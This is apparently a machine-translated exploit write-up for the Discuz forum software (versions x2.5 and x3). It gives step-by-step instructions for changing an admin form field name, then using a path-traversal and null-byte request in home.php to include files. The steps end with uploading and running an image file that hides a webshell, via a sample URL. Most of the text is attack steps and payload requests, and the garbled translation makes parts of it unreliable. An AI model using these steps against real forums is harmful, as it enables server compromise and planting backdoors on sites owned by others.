Start reference:
Content-Disposition: form-data; name = "settingnew [profilegroupnew] [base] [available]" changed to Content-Disposition: form-data; name = "settingnew [profilegroupnew] [plugin] [available]" Access/home. php? Mod = spacecp & id =.../robots.txt % 0057 although 0x00 truncation is involved, GPC is ignored.
Exploitation:
The original post tested dz x3, And I tested dz x2.5 ignoring gpc.
**************************************** *****************************
1. first go to the background and capture a package.
2. Change the package
Change Content-Disposition: form-data; name = "settingnew [profilegroupnew] [base] [available]" to Content-Disposition: form-data; name = "settingnew [profilegroupnew] [plugin] [available]" Submit
3. Access after submission
/Home. php? Mod = spacecp & id =.../robots.txt % 00
4. Find a place to upload the image horse
5. Access img
http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00